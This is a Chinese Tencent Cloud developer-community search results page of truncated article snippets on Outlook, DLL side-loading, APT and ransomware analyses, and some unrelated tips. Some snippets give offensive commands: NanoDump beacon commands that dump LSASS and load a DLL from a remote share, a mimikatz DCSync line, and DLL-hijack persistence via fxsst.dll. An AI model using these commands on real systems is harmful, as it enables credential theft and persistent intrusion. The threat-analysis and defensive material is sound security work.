文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

OLEOutlook利用:一封邮件绕过所有企业安全防控

今天早些时候,我写OLE Package还是packager.dll的时候,一个Windows特性回溯到Windows 3.1,在之后的Windows版本中也存在,它允许在文档中嵌入任何内容!...更糟糕的是Outlook.exe作为中等完整性运行,并生成可执行文件(或批处理文件,或者其他你嵌入的内容)都是中等完整性,所以你就跳出了Outlook以及Windows的沙盒的保护。...例如许多微软数字签名工具就可以拿来作为其他内容的跳板,由于是微软的签名,可能你现在对那些签名是信认的不能再信任了。...其二为你的Office版本部署注册表ShowOLEPackageObj键值,默默的禁止Outlook中的OLE Package函数。...="true"> packager.dll 通过阻止packager.dll,你是可以粗暴的解决该问题

2.2K100

利用宏避免发送确认邮件时忘记添加附件

我做了一个Outlook的加载项实现这个功能,但是试验证明部署兼容性还是有一些问题(在一同事的Win7 x64 + Office 2007 x86上安装后不能加载)。所以这里分享一下用宏实现的方法。...当然你也可以先尝试一下加载项能否在你的电脑上正常工作,可以的话就不用搞这么复杂了:下载ISD WebTeam 重构邮件附件检查加载项For Outlook 2007/2010 准备工作 Office的默认设置在各个版本中各有不同...点击打开“开发工具”选项卡,并点击其下的“Visual Basic”(Outlook 2007 以前的版本中可能在“工具”下的“宏”子菜单里就有),如图4。...,首先检查邮件主题是否包含“重构待确认”字样(根据重构周知邮件规范),如果是,则检查是否包含后缀名为"html"或者"htm"的附件(必须检查后缀,因为签名中就有一张图片作为附件,同时邮件中也有可能有数量不定的图片附件...启用宏 重新打开Outlook,由于我们的宏没有进行数字签名,所以默认是没有启用的,启动时Outlook会弹出提示,请在弹出的提示框中点击“启用宏”(如图6,我的截图中第一项可用是因为进行了宏的数字签名

3.5K90
    • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    基于社会工程学的交互式恶意载荷投递机制研究:以假冒IT支持攻击链为例

    他们利用已获取的凭证和远程管理工具,像正常的IT管理员一样在网络中穿梭,窃取敏感数据、部署勒索软件或建立更深层次的持久化后门。3....ADNotificationManager.exe可能是一个真实的、签名的合法程序,或者是一个专门编写的加载器。...当用户运行该exe文件时,它会尝试加载某个特定的DLL(例如version.dll或wininet.dll)。由于恶意DLL存在于同一目录下,系统优先加载了它。...页面内容高度仿真,模仿了Microsoft Outlook或企业内部IT门户的界面。这种视觉上的欺骗性结合URL的可信度,使得即便是具备一定安全意识的员工也难以识别。...对于DLL侧加载攻击,可以采用基于行为的检测规则,监控进程加载非系统目录下的DLL的行为,特别是当加载的DLL与宿主程序不匹配或签名异常时。其次,加强网络流量分析(NTA)。

    11010

    如何使用NanoDump导出LSASS进程数据

    ; 6、默认情况下,MiniDump具有无效的签名以避免检测; 7、通过忽略不相关的DLL来减少转储的大小,NanoDump的输出数据大小约为10MB; 8、不需要提供LSASS的进程PID; 9、不会调用...、可以使用NanoDump的.exe版本在Cobalt Strike之外单独运行NanoDump; 工具安装&配置 首先,我们需要使用下列命令将该项目源码克隆至本地: git clone https...当转储完成后,DllMain将返回FALSE来控制LSASS卸载NanoDump DLL。 如需修改转储路径和签名配置,可以直接修改entry.c中的NanoDump函数。...NanoDump DLL上传和加载 beacon> load_ssp beacon> delete_file C:\Windows\Temp\[RANDOM].dll 加载本地DLL beacon>...load_ssp c:\ssp.dll 加载远程DLL beacon> load_ssp \\10.10.10.10\openShare\ssp.dll PPL绕过 beacon> nanodump_ppl

    2K10

    【Java报错已解决】java.lang.UnsatisfiedLinkError

    如果这些依赖项缺失或版本不兼容,也会导致UnsatisfiedLinkError。例如,一个本地库依赖于特定版本的图形库或操作系统的某些动态链接库(DLL),当这些依赖项不可用时,加载本地库就会失败。...例如,在Web应用程序中,如果没有正确配置服务器来允许加载本地库,或者在应用程序的部署描述符中有错误的设置,就可能出现问题。...2.2 方法二:排查本地库的依赖关系 确定依赖项: 如果本地库有文档或相关的开发资料,查看其列出的依赖项。了解本地库需要哪些其他库或系统资源来正常运行。...对于特定的第三方依赖库,按照其官方文档的指导进行安装。 检查依赖项的版本兼容性。如果发现依赖项的版本与本地库要求的不匹配,尝试升级或降级依赖项的版本。...某些框架可能有自己的类加载机制或对本地库加载有特殊要求,确保这些配置与本地库的加载需求相符合。

    88010

    虹科技术 | 终端入侵防御 | 在重大攻击中发现新的Babuk勒索软件

    技 术 分 析部署在开始在域中大规模感染之前,攻击者在域控制器中部署了以下恶意软件文件:·.bat 一个BAT脚本,负责检查安全解决方案的存在,并开始执行一个微软安装程序(.msi)·的工具,但容易受到DLL侧面加载的影响:·dbgeng.dll是主要的恶意软件组件,它冒充NTSD.exe使用的合法DLL,并利用DLL侧面加载漏洞。...中如前所述,NTDS.exe(SapphireIMSClient.exe)是一个合法的可执行文件,它加载了一个名为dbgeng.dll的已知核心DLL,而没有验证其路径。...攻击者在同一目录下投放了同名的恶意DLL。这导致了合法的微软签名进程的执行。攻击者之前也在使用有漏洞的Word Office应用程序。...移动目标防御技术由于这些威胁具有高度的规避性,而且主要存在于设备内存中,任何级别的NGAV或最佳EDR都无法可靠地检测和阻止它们。

    65720

    ScarCruft针对学术界的鱼叉式钓鱼攻击机制与防御体系研究

    文中提供Office子进程限制脚本、宏签名验证策略及Canary文档部署示例,为科研单位提供可落地的技术对策。...整个过程避免写入磁盘,多采用内存反射加载(Reflective DLL Injection),规避EDR文件扫描。...3.2 学术生态的特殊脆弱性高校环境存在三大结构性弱点:协作文化优先于安全:研究人员习惯通过邮件交换草稿,缺乏加密或签名验证;设备管理松散:个人笔记本常绕过MDM策略,宏默认启用;高权限账户泛滥:教授常拥有本地管理员权限...4.4 流程层:安全协作规范推广签名邮件:要求涉及敏感内容的通信必须使用S/MIME或PGP签名;专用协作平台:使用经安全加固的SharePoint或Nextcloud替代邮件附件交换;开展专项演练:模拟...技术实现上,AppLocker策略、宏签名验证与Canary信标构成了可快速部署的检测响应闭环。未来,随着AI辅助钓鱼内容生成与云原生协作工具普及,学术安全将面临更复杂挑战。

    22410

    解包分析攻击越南机场和其它组织机构的间谍程序

    它整体伪装成McAfee杀毒软件: 其签名信息显示为McAfee原始的有效签名证书: 这个签名证书当然不是假的,因为McAfee.exe确实是一个合法程序,但是,却被捆绑了恶意的DLL动态链接库文件,攻击者正是利用了这点进行程序劫持...恶意程序生成的bot类线程从低到高枚举本地地址空间,对局域网内其它主机进行侦察探测: 同时还尝试与远程C&C地址(air.dscvn.org)进行通信连接,在我们的分析测试中,该C&C地址已经失效: 4...shellcode加载 为了达到反调试分析目的,攻击者混淆加载有效载荷的方式非常具有技巧性。...McAfee.exe一旦执行,恶意程序就会在系统启动目录中加载名为McUtil.dll的动态库文件,由于系统不对恶意程序整体进行完整性检查,所以执行程序可以加载任意DLL文件: McUtil.dll被用来部署下一阶段文件...这种类型的恶意程序,其EXE或DLL文件只用来加载shellcode,并不包含恶意代码,虽然用户对PE文件的运行比较谨慎,但是这一次,可能就会比较倒霉。

    1.2K80

    RunAsPPL的对抗

    创建在域级别链接或链接到包含您的计算机帐户的组织单位的新 GPO。或者,您可以选择已部署的 GPO。 3. 右键单击 GPO,然后单击编辑以打开组策略管理编辑器。 4....- 2.自带驱动程序bypass 这个bypass的点就是加载一个官方的易受攻击的驱动程序,可以利用它在内核中运行任意代码,在我们加载官方驱动程序后,可以继续利用它来加载我们自己的未签名的驱动程序,这种技术不仅在此对抗...具有PROCESS_DUP_HANDLE特权的OpenProcess这允许我们复制句柄,我们直接复制进程句柄。 4....“已知 DLL” 是 Windows 应用程序最常加载的 DLL,它们被预加载到内存中(即它们被缓存),可以通过查看\KnownDlls对象管理器中目录的内容来查看缓存的dll 关键点来了,在正常的程序启动时...,程序加载dll,仅在映射文件时进行验证,即创建节的时候,相比之下PP进程是会进行dll的数字签名验证的过后才能加载,而PPL又和正常程序一样一样,这就是漏洞利用点,因为 DLL 的数字签名仅在映射文件时进行验证

    2.2K20

    IC设计中值得解决的小问题(三)

    相当多的企业部署了微软的 Exchange 企业邮件系统,那么 Outlook 自然就是使用最多的多平台邮件客户端了。...减小标记为已读的时间,可以快速归档一些不重要的通知类邮件 签名档加上自己的电话分机和手机号码,方便别人更快的找到自己,撰写和回复的签名档都加 为每个项目创建独立的文件夹,并创建一些邮件规则自动把某些不重要的邮件放到对应的文件夹...,降低收件箱中的邮件数量 每个项目文件夹下可以分别创建多个子文件夹 所有邮件包括自己创建的文件夹尽量放在服务器上,而不是本地,以方便移动端 Outlook 随时搜索历史邮件 随时删除没有保存价值、重复的邮件...,类似来回讨论的历史邮件,只要保留最新的一封即可,当然有重要结论的邮件必须保留 按照需要,把重要邮件拖到日历或者任务图标上,方便快捷的创建日程和任务 未处理的邮件放在收件箱,可以起到提醒的作用,处理完毕后及时移动到对应文件夹或删除...使用高级搜索找到特定的历史邮件 MS Word 表格中首字母大写的问题 IC 设计工作中,撰写文档是非常重要的一项工作。

    1.2K10

    推荐一个电脑发烧友的攻坚利器

    该工具可以详细记录和分析动态链接库(DLL)及其他模块在应用程序运行时的加载路径、加载顺序和加载来源等信息。...通过监控动态加载的模块,用户可以快速识别潜在的依赖项问题,包括版本冲突、不受信任模块的加载以及可能的安全风险(如 DLL 劫持)。这一工具特别适合在复杂应用程序调试、性能优化和安全审计的场景下使用。...功能概述 模块依赖关系分析 WinDepends 能够详细记录目标程序在运行过程中加载的所有模块信息,包括动态链接库的路径、加载的优先顺序、模块的来源(本地或网络),以及加载是否成功等。...通过审查模块加载来源和签名信息,它可以帮助用户确认加载模块是否可信,从而加强应用程序的安全性。 性能优化分析 每个模块的加载时间都会被记录下来。...优势和特点 WinDepends 的优势在于其轻量级和高效性,能够快速部署并对应用程序运行时的模块依赖关系进行深度分析。作为开源工具,它的代码透明,用户可以根据需要进行二次开发或扩展功能。

    16510

    Excel催化剂开源第29波-在Winform上使用富文本编辑器控件

    和一般Winform上用的RichText控件,别人BS的富文本编辑器就强大得多。 笔者找寻过程中,也总算找到一款很不错的开源控件,将它的dll编译后,还真能用了。...在Excel催化剂的批量邮件功能中, 为了得到最好的体验,不止是不用依赖OUTLOOK的组件来发邮件(好像VBA的方案只能用outlook组件,用户电脑没安装outlook就不能用),同时为了让用户可以在邮件正文编辑区的使用体验和...outlookup或网页端的发邮件体验一样,用了一个第3方的富文本编辑器,不是RichText控件,所以对网页的支持特别友好,随便复杂网页上的内容,粘贴过来,渲染得非常出色。...可以发送出去的邮件正文,不是纯文本的形式,毫无格式,同时可以发送本地图片,特别是有些时候,正文内容需要说明一切重要内容,无需点开附件查看,或者正文中有邮件签名时,签名位置有图片也是常有的事情,特别是放个二维码之类的...同样地水平有限,具体技术细节也不懂,只是能用起来的程度。只需引用以下的dll即可。

    1.5K20

    BinSkim 一款强大的二进制安全分析工具

    不安全的编译设置:二进制文件应采用最安全的编译设置,以启用操作系统提供的安全功能,并最大化编译器错误和警告报告。 签名问题:已签名的二进制文件应使用强加密算法进行签名。...递归分析多个文件 分析当前目录及其子目录下所有扩展名为 .dll 或 .exe 的文件: binskim analyze *.exe *.dll --recurse true 生成 SARIF...示例参数解析 --sympath 该参数用于指定符号服务器路径或本地符号缓存位置。...例如: binskim analyze myfile.dll --sympath "Cache*d:\symbols;Srv*https://symweb" 注意:如果未正确加载 PDB 文件,BinSkim...例如: 规则 ID 名称 检查内容 BA2002 避免使用易受攻击的依赖项 检查所有链接模块源代码 BA2006 使用安全工具构建 检查编译器版本 BA2011 启用堆栈保护 检查是否启用了 /GS 标志

    82410

    渗透测试与开发技巧

    需要在对应版本的.NET环境才能正常运行,通过c++编写的dll更加通用 通过rundll32.exe或者regsvr32能够加载dll,但要求dll包含特定的导出函数 参考: 《Code Execution...persistence》 方法11:Office加载项 如果系统已安装office软件,可通过配置Office加载项实现劫持,作为被动后门 常用利用方式: Word WLL Excel XLL Excel...Injection 通过DLL劫持,劫持Explorer.exe对fxsst.dll的加载 Explorer.exe在启动时会加载c:\Windows\System32\fxsst.dll(服务默认开启...,用于传真服务) 将payload.dll保存在c:\Windows\fxsst.dll,能够实现dll劫持,劫持Explorer.exe对fxsst.dll的加载 相同的利用方法: 将payload.dll...签名伪造 通过修改注册表,能够给PE文件添加微软证书 参考: 《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》 《Authenticode签名伪造——针对文件类型的签名伪造》 -

    5.4K20

    银狐组织利用税务诱饵对印度实体的APT攻击分析

    研究表明,传统基于签名的防病毒机制难以应对高度定制化的本土化诱饵攻击,需结合上下文感知、行为基线建模与自动化响应策略,构建面向地缘政治驱动型APT的纵深防御体系。...该组织长期被归因于具有中国背景,其攻击目标集中于政府、国防承包商、能源企业及区域国际组织。...RAT功能模块化:主控木马支持动态加载插件,如屏幕截图、键盘记录、文件枚举等,按需激活以降低内存足迹。...此阶段代码采用多层异或(XOR)与Base64混合编码,原始载荷被分割存储于资源段中。3.3 载荷释放与RAT部署解密后的第二阶段载荷为一个32位PE文件,功能为远程访问木马。...邮件网关若未强制显示完整扩展名或未对.exe进行深度拦截,极易漏判。4.2 静态检测无法应对混淆载荷银狐使用的多层编码与资源段隐藏技术,使文件哈希、字符串特征频繁变化,导致基于签名的AV产品失效。

    28010

    内网渗透-导出HASH的多种方式

    PPL,只要其签名者级别大于或等于;一个 PPL 可以打开另一个具有完全访问权限的 PPL,只要其签名者级别大于或等于;无论签名者级别如何,PPL 都无法以完全访问权限打开 PP。...它还可以防止这些进程加载未签名的 DLL。这是有道理的,否则整体安全模型将毫无意义,因为您可以使用任何形式的 DLL 劫持并将任意代码注入您自己的 PPL 进程。...如果在PP保护的情况下加载DLL,每个文件的数字签名都需要经过验证,因此在较新的win10/server2022/win11(大约2022.7更新)的版本中,已经无法使用PPLdump,因为ppl程序于...,但是还有dcsync的权限 lsadump::dcsync /domain:vvvv1.com /all /csv 经过测试,添加这两项的用户可以进行具有dcsync权限。...,但是还有dcsync的权限 lsadump::dcsync /domain:vvvv1.com /all /csv 经过测试,添加这两项的用户可以进行具有dcsync权限。

    1.8K10

    【Java】已解决Java中的java.lang.UnsatisfiedLinkError异常

    已解决Java中的java.lang.UnsatisfiedLinkError异常 一、问题背景 java.lang.UnsatisfiedLinkError是Java在尝试加载本地库(如.dll、....当Java虚拟机(JVM)找不到指定的本地方法实现,或者加载的本地库不兼容时,就会抛出这个异常。...JNI接口签名不匹配:Java中的native方法声明与本地库中的实际实现签名不匹配。...检查位版本:确保你的JVM和本地库都是32位或64位,不要混用。 JNI接口签名匹配:检查Java中的native方法声明与本地库中的实现是否完全匹配。...JNI签名:仔细核对Java中的native方法声明与本地库中的实现是否完全一致,包括方法名、参数类型和返回类型。 依赖管理:如果本地库依赖于其他库,确保这些依赖库也被正确加载。

    12.1K10
    点击加载更多

    相关资讯

    热门标签

    更多标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      腾讯云开发者

      扫码关注腾讯云开发者

      扫码关注腾讯云开发者

      领取腾讯云代金券

      热门产品

      热门推荐

      更多推荐

      Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

      深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

      腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

      领券